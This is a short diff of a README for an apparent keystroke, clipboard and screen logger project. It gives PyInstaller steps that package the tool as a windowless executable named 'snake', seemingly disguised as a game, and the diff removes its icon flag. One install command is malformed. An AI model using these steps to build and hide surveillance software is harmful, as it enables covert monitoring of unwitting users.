Zeal-L/Key-paste-screen-logger/README.md

 - You may need to install the corresponding Python version of Visual Studio to successfully convert py to pyd, otherwise it will report "Unable to find vcvarsall.bat" error
 1. `pip install requirements.txt`
 2. `python shell.py build_ext --inplace`
-3. `pyinstaller -F -w -n snake -i Snake.ico index.py`
+3. `pyinstaller -F -w -n snake index.py`
 4. `cd dist/ && ./snake.exe `